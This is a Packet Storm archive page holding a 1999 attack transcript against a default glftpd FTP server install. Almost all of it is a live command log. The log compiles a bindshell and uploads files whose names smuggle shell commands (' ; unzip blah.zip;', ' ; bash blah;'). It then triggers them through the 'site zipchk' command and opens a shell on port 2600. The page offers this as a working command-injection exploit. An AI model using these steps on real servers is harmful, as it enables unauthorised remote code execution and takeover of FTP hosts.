exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Dec 24, 1999
Authored by Suid | Site suid.kg

Example attack transcript against glftpd. This attack was performed against a default install with a single user account added.

SHA-256 | 70d7d889b43a2d66d151613a1294339e52ec80d676fc66dba686150ebe3bc64f


Change Mirror Download

This attack was performed against a default install of glftpd with a single user account added.
This attack was authorised (by me against me)

$ ftp
ftp> open ftp.target.com
Connected to
Name (ftp.target.com:suid): suid
331 Password required for suid.
230 User suid logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd Request
250- --NEWS--
250- New Feature: Login with (!)Username to kill ghost connections.
250- --=- Type SITE HELP for a list of special SITE commands -=--
250- ._____________________________________________________________________
250- | _ / _ / _ / _ / _____/____ ____/ ____/
250- | /_____/ /____/ / / /____/_____ / / / /____ /
250- |____| ._______ /____ /_______ /_______/ /__/ /_______/
250- .-=-------------------- /____/ ---------------------------------------=-.
250- `-=-------------------------------------------------------------------=-'
250- `-----( Type 'site request title' to make a request )-----'
250- .-===================================================================-.
250- | Directory and Race Info for ./Request |
250- |-===================================================================-|
250- | Uploader | Number of Files | Total Size (Bytes) | % of Upload |
250- |-===================================================================-|
250- | 1.glftpd | 5 | 1,189,325 | 100.0% |
250- |______________|_________________|____________________|_______________|
250- | Total : 01 | 5 | 1,189,325 | 100.0% |
250- `-===================================================================-'
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 0
226 [Ul:0.0MB][Dl:0.0MB][Credits:14.6MB][Speed:0.00K/s][Free:2914MB]
ftp> ^Z
[1]+ Stopped ftp
$ gcc ~/bindshell.c -o b -static
$ cat > blah
./b &
$ chmod a+rx b blah
$ zip blah.zip b blah
adding: b (deflated 70%)
adding: blah (stored 0%)
$ > " ; unzip blah.zip;"
$ > " ; bash blah;"
$ fg
ftp (wd: ~)
ftp> put blah.zip
local: blah.zip remote: blah.zip
200 PORT command successful.
150 Opening BINARY mode data connection for blah.zip.
226- Checking file integrity...
226- PASSED. Extracting FILE_ID.DIZ...
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:2770.37K/s][Free:2914MB]
274946 bytes sent in 0.0801 secs (3.4e+03 Kbytes/sec)
ftp> put " ; bash blah;"
local: ; bash blah; remote: ; bash blah;
200 PORT command successful.
150 Opening BINARY mode data connection for ; bash blah;.
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:0.00K/s][Free:2914MB]
ftp> put " ; unzip blah.zip;"
local: ; unzip blah.zip; remote: ; unzip blah.zip;
200 PORT command successful.
150 Opening BINARY mode data connection for ; unzip blah.zip;.
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:0.00K/s][Free:2914MB]
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 542
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:04 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 _;_bash_blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 _;_unzip_blah.zip;
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:51.94K/s][Free:2914MB]
ftp> rename "_;_unzip_blah.zip;" " ; unzip blah.zip;"
350 File exists, ready for destination name
250 RNTO command successful.
ftp> rename "_;_bash_blah;" " ; bash blah;"
350 File exists, ready for destination name
250 RNTO command successful.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 542
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:54.32K/s][Free:2914MB]
ftp> quote site zipchk " ; unzip blah.zip;"
unzip: can't find /site/Request/, /site/Request/.zip or /site/Request/.ZIP, so there.
ftp> ls
Archive: blah.zip
ftp> ls
inflating: b
ftp> ls
extracting: blah
ftp> ls
200- File ; unzip blah.zip; FAILED zipcheck.
200 Command successful.
200 PORT command successful.
ftp> ls -la
200 PORT command successful.
200 PORT command successful.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 2329
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b
-rwxr-xr-x 1 suid NoGroup 18 Dec 23 00:02 blah
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:46.36K/s][Free:2914MB]
ftp> quote site zipchk " ; bash blah;"
200 PORT command successful.
ftp> ls
150 Opening ASCII mode data connection for directory listing.
ftp> ls
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:74.83K/s][Free:2914MB]
200 PORT command successful.
ftp> ls
150 Opening ASCII mode data connection for directory listing.
ftp> ls
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:71.87K/s][Free:2914MB]
unzip: can't find /site/Request/, /site/Request/.zip or /site/Request/.ZIP, so there.
ftp> ls
200- File ; bash blah; FAILED zipcheck.
200 Command successful.
200 PORT command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 2325
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b
-rwxr-xr-x 1 suid NoGroup 18 Dec 23 00:02 blah
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:52.23K/s][Free:2914MB]
ftp> ^Z
[1]+ Stopped ftp (wd: ~)
$ telnet ftp.target.com 2600
Connected to ftp.target.com.
Escape character is '^]'.
/bin/bash -i;
[suidl@ftp ~]$ ls -la
total 1173
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b
-rwxr-xr-x 1 suid NoGroup 18 Dec 23 00:02 blah
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
[suid@ftp ~]$
[suid@ftp ~]$ exit

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2024 Packet Storm. All rights reserved.

Security Services
Hosting By